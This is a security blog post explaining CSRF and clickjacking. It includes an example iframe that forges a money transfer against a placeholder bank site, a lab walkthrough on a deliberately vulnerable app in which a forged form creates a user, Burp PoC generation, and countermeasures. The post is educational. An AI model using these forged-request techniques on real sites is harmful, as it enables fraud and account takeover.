Clickjacking, also known as a "UI redress attack", happens is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.<br />
<br />
For example, imagine an attacker who builds a web site that has a button on it that says "click here for a free iPod". However, on top of that web page, the attacker has loaded an iframe with your vulnerable e-banking account, and lined up exactly the "transfer money" button directly on top of the "free iPod" button. The victim tries to click on the "free iPod" button but instead actually clicked on the invisible "transfer money" button. In essence, the attacker has "hijacked" the user's click, hence the name "Clickjacking". Again the attack scenario would be the similar to the ones just described above so there is no need for me to modify and explain again the attack scenarion. What is interesting though would be to show you an iframe that performs a CSRF attack.<br />
<br />
Well an iframe that performs a CSRF attack would look something like that:<br />
<br />
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr>
<td><iframe src="http://www.victim.com/homepage/transferEuros=3000?maliciousUserAccount=9832487"></td>
</tr>
</tbody></table>
<br />
<b>Note:</b> You can see how beautiful this attack is and how simple and smooth can be implemented.<br />
<b><br /></b>
<span style="font-weight: bold;">CSRF and Exposed Session Variables</span><br />
<span style="font-weight: bold;"><br /></span>
By simply passing the session or other session variables in the URL e.g. such the AntiCSRF token, means asking for trouble. The Session Tokens (Cookie, SessionID, Hidden Field), if exposed, will usually enable an attacker to impersonate a victim and access the application illegitimately. As such, it is important that they are protected from eavesdropping at all times – particularly whilst in transit between the Client browser and the application servers.<br />
<br />
The information here relates to how transport security applies to the transfer of sensitive Session ID data rather than data in general, and may be stricter than the caching and transport policies applied to the data served by the site. Using a personal proxy, it is possible to ascertain the following about each request and response:<br />
<ul class="ul1">
<li class="li2">Protocol used (e.g., HTTP vs. HTTPS)</li>
<li class="li2">HTTP Headers</li>
<li class="li2">Message Body (e.g., POST or page content)</li>
</ul>
<div class="p1">
Each time Session ID data is passed between the client and the server, the protocol, cache, and privacy directives and body should be examined. Transport security here refers to Session IDs passed in GET or POST requests, message bodies, or other means over valid HTTP requests. As you already understand stealing the Session ID and/or the AntiCSRF token might result in the attacker being able to form links such as the following one:</div>
<div class="p1">
<br /></div>
<div class="p1">
<table align="center" bgcolor="00CCFF" border="1"><tbody>
<tr><td>http://www.vulnerable.com/?<span style="color: red;">sessionid=ligdlgkjdng</span>?<span style="color: red;">anticsrftoken=kjnsdldfksjdnk</span>?transferEuros=3000?maliciousUserAccount=9832487 </td></tr>
</tbody></table>
</div>
<div>
</div>
<br />
<b>Note:</b> The above information can be used to generate a link for a malicious user.<br />
<b><br /></b>
<b>The attack scenario?</b><br />
<br />
For my demo I choose multidae vulnerable web application which can be found on <a href="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project"><span class="s1">OWASP's Vulnerable Apps VM</span></a>, an intercepting proxy tool (I used <a href="http://www.portswigger.net/burp/download.html"><span class="s1">Portswigger's Burp Proxy</span></a>, however it is not essential, just a "View Source" from any browser can work on most cases) and an Apache web server.<br />
<span style="background-color: #fefdfa; color: #333333; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 13px; line-height: 18px;"><br /></span>
<span style="background-color: #fefdfa; color: #333333; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 13px; line-height: 18px;">In the following picture you can see the main page of Multidae's web application as it can be browsed by any -non authenticated- user.</span><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDOXro5aUnQBRMqrs_kR_GEgKPgxsO_GgUA92DLnx89SMTnzy-FLv9Hndf6LepwUVIsWaYBS7nptoy2d7UD9Kq0TAj014ZhdxM6q55TeBerP8kfvpfJGT_epxEnCSg_srZSwN1YpWPM1E/s1600/1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDOXro5aUnQBRMqrs_kR_GEgKPgxsO_GgUA92DLnx89SMTnzy-FLv9Hndf6LepwUVIsWaYBS7nptoy2d7UD9Kq0TAj014ZhdxM6q55TeBerP8kfvpfJGT_epxEnCSg_srZSwN1YpWPM1E/s1600/1a.png" width="640" /></a></div>
<b><br /></b>
<br />
<div class="p1">
In this web application any user can register an account, but our goal is to register the account with the administrator's privileges. Below is the "register user" page that any, unauthenticated user can see.</div>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhppf-dDSNexwl4P4QnICFZN7fFbdo9Mj8qIQQ9YR6FBje3j9uDt3kFqbBsdIoVIa55bxGBYhl6UaBav7olU3z9A2opZRHM1BtBrFVU3OppgI6kAvKx1o_0nUZc4kDVpCEPoi6Q2rbgVlM/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhppf-dDSNexwl4P4QnICFZN7fFbdo9Mj8qIQQ9YR6FBje3j9uDt3kFqbBsdIoVIa55bxGBYhl6UaBav7olU3z9A2opZRHM1BtBrFVU3OppgI6kAvKx1o_0nUZc4kDVpCEPoi6Q2rbgVlM/s1600/2.png" width="640" /></a></div>
<b><br /></b>
<br />
<div class="p1">
If we view the source of the "Register Account" page, we can identify the forms (and therefore the POST request) that are being sent to the web application. That data are then processed by the application and the user is created.</div>
<div class="p1">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbQKEccJwslBbsMgCLpZvLoM5ot_9ZRSTBxxCeWxVG7PkwZZJJAKS8NBNI9UfpeCVfTGpVSHLUv37_oFfv0vfn9lyTK2KVyh04_xNErVEgau_WCqA4K_5xEKpTyrwRRCs1Y5736tlq4s/s1600/source.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbQKEccJwslBbsMgCLpZvLoM5ot_9ZRSTBxxCeWxVG7PkwZZJJAKS8NBNI9UfpeCVfTGpVSHLUv37_oFfv0vfn9lyTK2KVyh04_xNErVEgau_WCqA4K_5xEKpTyrwRRCs1Y5736tlq4s/s1600/source.png" width="544" /></a></div>
<div class="p1">
<br /></div>
Now, the attacker can create his own form at his web server and populate the HTML fields with the data of the user he wants to create on the system. (Note: no code expertise is needed in order to create this HTML page!). The following picture, you can see the HTML page that creates on his web server. He creates a user named "andrew", with password "qwerty".<br />
<div class="p1">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpDYnsWCVVGbvpJXLfn7-NHijfLJ0Jih4QZzOEpBIWHvpE3u9Mina8q-vYpNdG7msPeh0gWvtAKRsZIXYlNl8Qfi6kAyXQEZaQtW3RaQdm6Jdej9JmBhNZ4ze20DxKDYv6dIhvnzmeSo/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpDYnsWCVVGbvpJXLfn7-NHijfLJ0Jih4QZzOEpBIWHvpE3u9Mina8q-vYpNdG7msPeh0gWvtAKRsZIXYlNl8Qfi6kAyXQEZaQtW3RaQdm6Jdej9JmBhNZ4ze20DxKDYv6dIhvnzmeSo/s1600/7.png" width="640" /></a></div>
<br /></div>
Now he launches the web server (192.168.200.14) hosting this page. At this point, he needs the user's interaction. This could be accomplished, for example, by a phishing attack scenario: the victim receives an email inviting the victim to visit the attacker's page saying "click here to win an iPhone 5", or he could attach this message this "iPhone 5 message" at the page he created!<br />
<div class="p2">
<br /></div>
<div class="p2">
Just imagine:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_eV_CsRIAiI0PEj9uAotccCZuIh1vktOQgEsjEG1-wFbhgT32C8XoncTBx9BaQ5QgZ5JBzhtKsP1z2llh5ps_M56HXfE1VryAafWoNRm3j_TDbj-L3KDAPgrpXq8CameOH9VnYk5IQmo/s1600/iphone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_eV_CsRIAiI0PEj9uAotccCZuIh1vktOQgEsjEG1-wFbhgT32C8XoncTBx9BaQ5QgZ5JBzhtKsP1z2llh5ps_M56HXfE1VryAafWoNRm3j_TDbj-L3KDAPgrpXq8CameOH9VnYk5IQmo/s1600/iphone.png" width="640" /></a></div>
<b><br /></b>
<br />
And this is how it will appear on the victim's web browser:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNVc_tK_BhbCD8Sw0FF31a6OQB6vzoAUt3Si2tilpVg6qWxBV4XGnzxzelPeZ4FKd0SSxXZKahARPIpqiSbcQ1QJga6bab6EzVbzy_uB_bL7WnMCoKTVlUMGkWU01jY51yfgtlKZ2dVvk/s1600/iphone2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNVc_tK_BhbCD8Sw0FF31a6OQB6vzoAUt3Si2tilpVg6qWxBV4XGnzxzelPeZ4FKd0SSxXZKahARPIpqiSbcQ1QJga6bab6EzVbzy_uB_bL7WnMCoKTVlUMGkWU01jY51yfgtlKZ2dVvk/s1600/iphone2.png" width="640" /></a></div>
<br />
The victim, which is at the same time logged in with this account at
Multidae web application, is now tricked to click on the button and
submit a register user form with the username and password set by the
attacker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqqIJ532Q_mEo-mnbKVGljtAcrtavTg2PjdzLReza8K4V5M7ER6DDeIFxIX5J6R3qvVmgr5IJgAFF7KTQC7HcwVo8OaGo6wpxXOqVfMbnsZd5mF0z9bQ18eFi6gAw6A3KMakjkSimqF1A/s1600/12csrf_successful.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqqIJ532Q_mEo-mnbKVGljtAcrtavTg2PjdzLReza8K4V5M7ER6DDeIFxIX5J6R3qvVmgr5IJgAFF7KTQC7HcwVo8OaGo6wpxXOqVfMbnsZd5mF0z9bQ18eFi6gAw6A3KMakjkSimqF1A/s1600/12csrf_successful.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9udeFEmuXvGWrPCQAeTZ5OAtf_oblRY4B-A70u-mpDhDeq6Kbb5eieve4Jj06GZS0LO_wgTljQVxgTjHvwrrETQF5ROPWNVoQK4moosMD68cbooQSfJjl2ZU0GP2ILmpWI8mpjI_XToU/s1600/13logs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9udeFEmuXvGWrPCQAeTZ5OAtf_oblRY4B-A70u-mpDhDeq6Kbb5eieve4Jj06GZS0LO_wgTljQVxgTjHvwrrETQF5ROPWNVoQK4moosMD68cbooQSfJjl2ZU0GP2ILmpWI8mpjI_XToU/s1600/13logs.png" width="640" /></a></div>
Now user "andrew" can log in with the password set during the CSRF request.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegfmiPgwc1NTgeJ85T76uHEbl4zJ_pnn9Z4UzCzaZM2LseJArZjsxUfr4iyCmNT0hUGQY43T64KgUQh2g6vep7TLqom1GTUlfDt3sZS2ZOh-SeK8zaUcVvIqCUolQ7p9eAZMOwwW8DTE/s1600/andrewLogsin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegfmiPgwc1NTgeJ85T76uHEbl4zJ_pnn9Z4UzCzaZM2LseJArZjsxUfr4iyCmNT0hUGQY43T64KgUQh2g6vep7TLqom1GTUlfDt3sZS2ZOh-SeK8zaUcVvIqCUolQ7p9eAZMOwwW8DTE/s1600/andrewLogsin.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMusae96yGMLmk2ks36_cpF2qpgVJL2DOQJZiusAcAGobLFn0t3H_00fKJ5TJtbwGurV5YDKpJlGnOhibAlTz-t-5_bDcT6pawrCBHO3fPvKqmf5jjonzpPNGbc0YBFEDZeQfCuDoRyGg/s1600/andrewLogsin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMusae96yGMLmk2ks36_cpF2qpgVJL2DOQJZiusAcAGobLFn0t3H_00fKJ5TJtbwGurV5YDKpJlGnOhibAlTz-t-5_bDcT6pawrCBHO3fPvKqmf5jjonzpPNGbc0YBFEDZeQfCuDoRyGg/s1600/andrewLogsin2.png" width="640" /></a></div>
<br />
At point the CSRF attack scenario is completed. We sucessfuly managed to exploit a CSRF vulnerability and add a user to the vulnerable web application.<br />
<br />
<b>The CASE studies for CSRF</b><br />
<b><br /></b>
This site <a href="https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/" target="_blank">here</a> contains many popular web sites that were vulnerable to CSRF attacks. An interesting extract from the article can be found here:<br />
<br />
"<b style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">1. ING Direct</b><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;"> </span><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">(</span><a href="http://www.ingdirect.com/" style="color: #195a8c; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; text-decoration: initial;">ingdirect.com</a><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">)</span><br />
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<i>Status: Fixed</i></div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
We found a vulnerability on ING’s website that allowed additional accounts to be created on behalf of an arbitrary user. We were also able to transfer funds out of users’ bank accounts. We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution. Specific details are described in our paper.</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<b>2. YouTube</b> (<a href="http://www.youtube.com/" style="color: #195a8c; text-decoration: initial;">youtube.com</a>)</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<i>Status: Fixed</i></div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
We discovered CSRF vulnerabilities in nearly every action a user could perform on YouTube. An attacker could have added videos to a user’s "Favorites," added himself to a user’s "Friend" or "Family" list, sent arbitrary messages on the user’s behalf, flagged videos as inappropriate, automatically shared a video with a user’s contacts, subscribed a user to a "channel" (a set of videos published by one person or group) and added videos to a user’s "QuickList" (a list of videos a user intends to watch at a later point). Specific details are described in our paper.</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<b>3. MetaFilter</b> (<a href="http://www.metafilter.com/" style="color: #195a8c; text-decoration: initial;">metafilter.com</a>)</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<i>Status: Fixed</i></div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
A vulnerability existed on Metafilter that allowed an attacker to take control of a user’s account. A forged request could be used to set a user’s email address to the attacker’s address. A second forged request could then be used to activate the "Forgot Password" action, which would send the user’s password to the attacker’s email address. Specific details are described in our paper.</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
(MetaFilter fixed this vulnerability in less than two days. We appreciate the fact that MetaFilter contacted us to let us know the problem had been fixed.)</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<b>4. The New York Times</b> (<a href="http://www.nytimes.com/" style="color: #195a8c; text-decoration: initial;">nytimes.com</a>)</div>
<i style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">Status: Not Fixed. We contacted the New York Times in September, <b>2007</b>. <s>As of September 24, <b>2008</b>, this vulnerability still exists. </s></i><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">This problem has been fixed.</span>"<br />
<b><br /></b>
<b>Note: </b>You can see from the above extract that CSRF issues are very popular these days.<br />
<br />
<b>Tools for CSRFing the Web</b><br />
<br />
The Burp Proxy tool (the Pro version of course) can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for a given request.To access this function, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC" within "Engagement tools" in the context menu.<br />
<br />
When you execute this function, Burp shows the full request you selected in the top panel, and the generated CSRF HTML in the lower panel. The HTML uses a form with a suitable action URL, encoding type and parameters, to generate the required request when the browser submits the form.You can edit the request manually, and click the "Regenerate" button to regenerate the CSRF HTML based on the updated request.<br />
<br />
You can test the effectiveness of the generated PoC in your browser, using the "Test in browser" button. When you select this option, Burp gives you a unique URL that you can paste into your browser (configured to use the current instance of Burp as its proxy). The resulting browser request is served by Burp with the currently displayed HTML, and you can then determine whether the PoC is effective by monitoring the resulting request(s) that are made through the Proxy.Some points should be noted regarding form encoding:<br />
<br />
• Some requests (e.g. those containing raw XML or JSON) have bodies that can only be generated using a form with plain text encoding. With each type of form submission using the POST method, the browser will include a Content-Type header indicating the encoding type of the form that generated the request. In some cases, although the message body exactly matches that required for the attack request, the application may reject the request due to an unexpected Content-Type header. Such CSRF-like conditions might not be practically exploitable. Burp will display a warning in the CSRF PoC generator if this is liable to occur.<br />
<br />
• If you manually select a form encoding type that cannot be used to produce the required request, Burp will generate a best effort at a PoC and will display a warning.<br />
<br />
• If the CSRF PoC generator is using plain text encoding, then the request body must contain an equals character in order for Burp to generate an HTML form which results in that exact body. If the original request does not contain an equals character, then you may be able to introduce one into a suitable position in the request, without affecting the server's processing of it.<br />
<br />
<b>CSRF PoC Options</b><br />
<br />
The following options are available:<br />
<br />
• Include auto-submit script - Using this option causes Burp to include a small script in the HTML that causes a JavaScript-enabled browser to automatically submit the form (causing the CSRF request) when the page is loaded.<br />
<br />
• Form encoding - This option lets you specify the type of encoding to use in the form that generates the CSRF request. The "Auto" option is generally preferred, and causes Burp to select the most appropriate encoding capable of generating the required request.<b> </b><br />
<br />
The following picture shows a screen shot from Burp CSRF PoC tool while doing right click on an intercepted request:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYhhx8-AwxYoY95SFJBCPAKessvw24NO5GvQNGKi2cVQnjLcpwokxjLntya0zmUG2mZB_aMwcwRxF5TkRz66NzSqbOxJKBGR0fVNtpsNYIzsTeWMp336FO9YdtaJwN0U8LCsw8WS8V-o/s1600/burp+csrf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="535" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYhhx8-AwxYoY95SFJBCPAKessvw24NO5GvQNGKi2cVQnjLcpwokxjLntya0zmUG2mZB_aMwcwRxF5TkRz66NzSqbOxJKBGR0fVNtpsNYIzsTeWMp336FO9YdtaJwN0U8LCsw8WS8V-o/s1600/burp+csrf1.png" width="640" /></a></div>
<br />
The following picture shows the generated CSRF PoC:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZgvSrBDAc7BAtthNNsnMZ83smVNRnulCaZEGgP6KVhAb65DNgoiae0pOgOOjaAoxln8ePEBwEvTelh1RYjt22EhKRK7pFMfiyVEJDDB2fVMzE7gf9zE_ZRMrmasTA7IaLteC8rSLo6r4/s1600/csrfgen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZgvSrBDAc7BAtthNNsnMZ83smVNRnulCaZEGgP6KVhAb65DNgoiae0pOgOOjaAoxln8ePEBwEvTelh1RYjt22EhKRK7pFMfiyVEJDDB2fVMzE7gf9zE_ZRMrmasTA7IaLteC8rSLo6r4/s1600/csrfgen.png" width="640" /></a></div>
<br />
<b>Note: </b>Right click the intercepted Http GET or POST request and click CSRF PoC. It should not be a problem if the web application accepts POST to GET interchanges for obvious reasons.<br />
<b><br /></b>
<br />
<b>Prevention Measures That Do NOT Work</b><br />
<b><br /></b>
<u>Using a Secret Cookie:</u><br />
<br />
Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.<br />
<br />
<u>Only Accepting POST Requests:</u><br />
<br />
Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.<br />
<br />
<u>Multi-Step Transactions:</u><br />
<br />
Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.<br />
<br />
<u>URL Rewriting:</u><br />
<br />
<br />
This might be seen as a useful CSRF prevention technique as the attacker can not guess the victim's session ID. However, the user’s credential is exposed over the URL.<br />
<b><br /></b>
<b>CSRF countermeasures </b><br />
<br />
CSRF attacks are very hard to trace and probably are not traceable unless one the two or more of the following conditions are met:<br />
<ol>
<li>Detailed Web Application user auditing exists and is enabled.</li>
<li>Concurrent logins are not allowed (allowing concurrent logins would remove none repudiation).</li>
<li>The Web Application binds the Web Application session with the user IP (that way if the user is behind a NAT only users from the same intranet would be able to perform a CSRF attack).</li>
<li>AntiCSRF tokens are used per Web Application function. An AntiCSRF token in order to be effective would have to be:</li>
<ul>
<li>Truly Random.</li>
<li>Bind to every Web Application function (different per Web Application function).</li>
<li>Behave like a session (e.g. expire after a certain time, expire e.t.c).</li>
<li>Use a two factor authentication per token (e.g make of a RSA token to generate the AntiCSRF to perform a transaction etc). </li>
</ul>
</ol>
<div>
<b>Other technologies for protecting against CSRF</b></div>
<div>
<b><br /></b></div>
<div>
<div class="p1">
In the web there are numerous references regarding the implementation of anti-CSRF tokens. Some examples can be found here: </div>
</div>
<ul class="ul1">
<li class="li1">Using View State to prevent CSRF attacks (example <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Viewstate_.28ASP.NET.29"><span class="s1">here</span></a>)</li>
<li class="li2"><a href="https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project">OWASP CSRFGuard Project</a><span class="s2"> for Java</span></li>
<li class="li2"><a href="https://www.owasp.org/index.php/PHP_CSRF_Guard">PHP CSRF Guard</a><span class="s2"> </span></li>
<li class="li2"><a href="https://www.owasp.org/index.php/.Net_CSRF_Guard">.Net CSRF Guard</a></li>
<li class="li3">Anti CSRF for <a href="http://docs.joomla.org/How_to_add_CSRF_anti-spoofing_to_forms"><span class="s1">Joomla!</span></a></li>
</ul>
<div>
The mentality promoted by the above technologies is abvious, we should deploy a mechanism that would make unique every session initiated by the user. This can be achieved by sending the browser an anti-CSRF token that would be appended in every request the browser sends to the server. The above technique is being explained in more technical terms in <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet"><span class="s1">OWASP's CSRF Prevention cheat sheet</span></a>:</div>
<div class="p2">
<br /></div>
<div class="p1">
"<i>These challenge tokens are the inserted within the HTML forms and links associated with sensitive server-side operations. When the user wishes to invoke these sensitive operations, the HTTP request should include this challenge token. It is then the responsibility of the server application to verify the existence and correctness of this token. By including a challenge token with each request, the developer has a strong control to verify that the user actually intended to submit the desired requests. Inclusion of a required security token in HTTP requests associated with sensitive business functions helps mitigate CSRF attacks as successful exploitation assumes the attacker knows the randomly generated token for the target victim's session. This is analogous to the attacker being able to guess the target victim's session identifier.</i>"</div>
<div>
<br /></div>
<b>Epilogue</b><br />
<br />
This blog post attempted to cover thoroughly the subject of CSRF and I believe that I managed to do that. Now there are obviously a lot more things to say about how to protect against a CSRF but for the purposes of this post is out of scope. Merry Christmas and a Happy New year. <br />
<br />
<b>References:</b><br />
<ol>
<li><a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)</a></li>
<li><a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">http://en.wikipedia.org/wiki/Cross-site_request_forgery</a></li>
<li><a href="https://www.owasp.org/index.php/Testing_for_Exposed_Session_Variables_(OWASP-SM-004)">https://www.owasp.org/index.php/Testing_for_Exposed_Session_Variables_(OWASP-SM-004)</a></li>
<li><a href="http://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx">http://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx</a></li>
<li><a href="https://www.owasp.org/index.php/Session_fixation">https://www.owasp.org/index.php/Session_fixation</a></li>
<li><a href="http://ajaxian.com/archives/gmail-csrf-security-flaw">http://ajaxian.com/archives/gmail-csrf-security-flaw</a></li>
<li><a href="http://www.portswigger.net/burp/help/suite_functions_csrfpoc.html">http://www.portswigger.net/burp/help/suite_functions_csrfpoc.html</a> </li>
<li><a href="https://nealpoole.com/blog/2012/03/csrf-clickjacking-and-the-role-of-x-frame-options/">https://nealpoole.com/blog/2012/03/csrf-clickjacking-and-the-role-of-x-frame-options/</a></li>
<li><a href="http://fragilesecurity.blogspot.gr/2012/11/cross-site-request-forgery-legitimazing.html">http://fragilesecurity.blogspot.gr/2012/11/cross-site-request-forgery-legitimazing.html</a></li>
<li><a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet</a></li>
<li><a href="https://blogs.apache.org/infra/entry/apache_org_04_09_2010">https://blogs.apache.org/infra/entry/apache_org_04_09_2010</a></li>
<li><a href="https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/">https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/</a></li>
<li><a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Viewstate_.28ASP.NET.29">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Viewstate_.28ASP.NET.29</a></li>
<li>
<div class="p1">
<a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</a><br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
</li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-18183357271473527152012-11-06T15:41:00.000-08:002012-12-08T09:25:22.949-08:00The Da Vinci Cod(e) Review<b>Introduction</b><br />
<b><br /></b>
This article is going to talk about performing Web Application security code reviews the proper way (also known as my way). The best approach to perform a Web Application security code review would be to have at your disposal the Web Application (uploaded and running in a Web Server) and of course the Web Application code itself, because you would be able to verify your findings in real time (e.g. exploit an Cross Site Scripting Issue immediately after you identify the issue in the code).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQyNgx9F7Vsar2tIgqooNFHwRhcdMDbZlIGCHXvEsv822YzmlDUacYNSzKZCaQbpto-5Ympu0I2VRIrFnGzYI8F227J_wYy4vqniiG-juMI9NVnQRFytJ6MByxJkRRLLCeERXMTT7n4M/s1600/cod.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQyNgx9F7Vsar2tIgqooNFHwRhcdMDbZlIGCHXvEsv822YzmlDUacYNSzKZCaQbpto-5Ympu0I2VRIrFnGzYI8F227J_wYy4vqniiG-juMI9NVnQRFytJ6MByxJkRRLLCeERXMTT7n4M/s1600/cod.jpeg" height="320" width="320" /></a></div>
<br />
